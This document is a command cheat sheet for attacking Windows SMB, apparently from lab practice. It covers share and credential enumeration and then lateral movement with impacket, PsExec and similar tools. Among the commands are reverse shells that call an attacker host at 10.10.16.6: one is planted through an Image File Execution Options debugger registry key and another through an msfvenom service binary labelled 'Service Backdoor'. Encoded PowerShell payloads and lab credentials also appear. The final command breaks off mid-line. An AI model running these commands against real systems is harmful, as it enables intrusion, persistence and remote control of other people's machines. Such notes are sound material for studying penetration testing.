Resources

Commands

  • Recon
    • Nmap
      nmap 172.20.0.52 -sV -sC -p139,445 -Pn
      nmap --script smb-vuln* 172.20.0.52
    • Nbtscan
      nbtscan -r 172.20.0.0-255 -v
    • smbmap
      smbmap -H 172.20.0.52 => open shares
      smbmap -u Helen -p RedRiot88 -H 172.20.0.52
    • smbclient
      smbclient -L 172.20.0.52 -U "Helen%RedRiot88"
       
      smbclient //10.129.228.253/Public -U '%' -c 'get "SQL Server Procedures.pdf"'
    • rpcclient
      rpcclient -U "Helen%RedRiot88" 172.20.0.52
      rpcclient -U "" -N 172.20.0.52
    • nxc
      nxc smb 172.20.0.52 -u Helen -p 'RedRiot88' --shares
      nxc smb 172.20.0.52 -u Helen -p 'RedRiot88' -M spider_plus -o STATS_FLAG=False
    • smbcrawler
      smbcrawler crawl -u administrator -p Password123#a -t 10 -D 2 -w -i hosts.txt
    • impacket-lookupsid
      impacket-lookupsid 'inlanefreight.local/Helen:RedRiot88@172.20.0.52'
    • enum4linux / enum4linux-ng
      enum4linux -u Helen -p RedRiot88 -a 172.20.0.52
      enum4linux-ng -u Helen -p RedRiot88 -A 172.20.0.52
    • manspider
      manspider 172.20.0.52 -u Helen -p 'RedRiot88' -d inlanefreight.local -t 256 -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg pfx cfg conf config vmdk vhd vdi dit
    • net
      net view \\172.20.0.52 /ALL
       
      net view CASTELBLACK
      net share
      net use x: \\CASTELBLACK\all
    • Powerview
      Get-NetShare -ComputerName CASTELBLACK
       
      Find-DomainShare -CheckShareAccess -Verbose
       
      Get-PathAcl "\\castelblack.north.sevenkingdoms.local\all"
       
      Find-InterestingDomainShareFile -Verbose => the most useful of these
    • snaffler
      Snaffler.exe -o C:\Users\helen\Desktop\log.txt -s -c DC01.inlanefreight.local
       
      .\loader.exe -path "http://192.168.99.22/exe/Snaffler.exe" -args " -s "
    • Invoke-HuntSMBShares
      Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\Users\helen\Desktop
  • Exploitation
    • Impacket
      • Psexec
        impacket-psexec 'inlanefreight.local/Helen:RedRiot88@172.20.0.52'
      • smbserver
         impacket-smbserver share -smb2support /root/Tools/netcat-win32-1.12/nc64.exe
         rlwrap nc -nlvp 7777
         
         reg.exe add "\\srv02.inlanefreight.local\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t reg_sz /d "cmd /c copy \\10.10.16.6\share\nc.exe && nc.exe -e \windows\system32\cmd.exe 10.10.16.6 7777"
         reg.exe add \\srv02.inlanefreight.local\HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth /d 1 /t REG_DWORD /f
      • smbexec
        impacket-smbexec "INLANEFREIGHT/helen:RedRiot88@172.20.0.52"
      • services
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 list
         msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe-service -o rshell-7777s.exe
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 create -name 'Service Backdoor' -display 'Service Backdoor' -path "\\\\10.10.16.6\\share\\rshell-7777.exe"
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name 'Service Backdoor'
         impacket-smbserver share -smb2support ./
         rlwrap nc -nlvp 7777
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name 'Service Backdoor'
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 delete -name 'Service Backdoor'
         
         OR 
         
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name Spooler
         impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 change -name Spooler -path "\\\\10.10.14.207\\share\\rshell-9001.exe" -start_type 2
        rlwrap nc -nlvp 7777
        impacket-smbserver share -smb2support ./
        impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name Spooler
      • atexec
        impacket-atexec INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 "powershell -e JABjAGwAaQ...."
    • psexecsvc
      python3 psexecsvc.py 'inlanefreight.local/Helen:RedRiot88@172.20.0.52' -service-name nothacker -remote-binary-name notshell -user
      
    • psexec.exe
      .\PsExec.exe \\SRV02 -i -u INLANEFREIGHT\helen -p RedRiot88 cmd -accepteula
      .\PsExec.exe \\SRV02 -i -s cmd -accepteula
    • SharpNoPSExec.exe
      # Attacker 
      rlwrap nc -nlvp 7777
       
      # Victim
      .\SharpNoPSExec.exe --target=172.20.0.52 --payload='c:\windows\system32\cmd.exe /c powershell -e JABjAGwA......'
    • NimExec.exe
      rlwrap nc -nlvp 7777
      .\NimExec.exe -u helen -d inlanefreight.local -p RedRiot88 -t 172.20.0.52 -c 'cmd.exe /c powershell -e JABjAG

Tools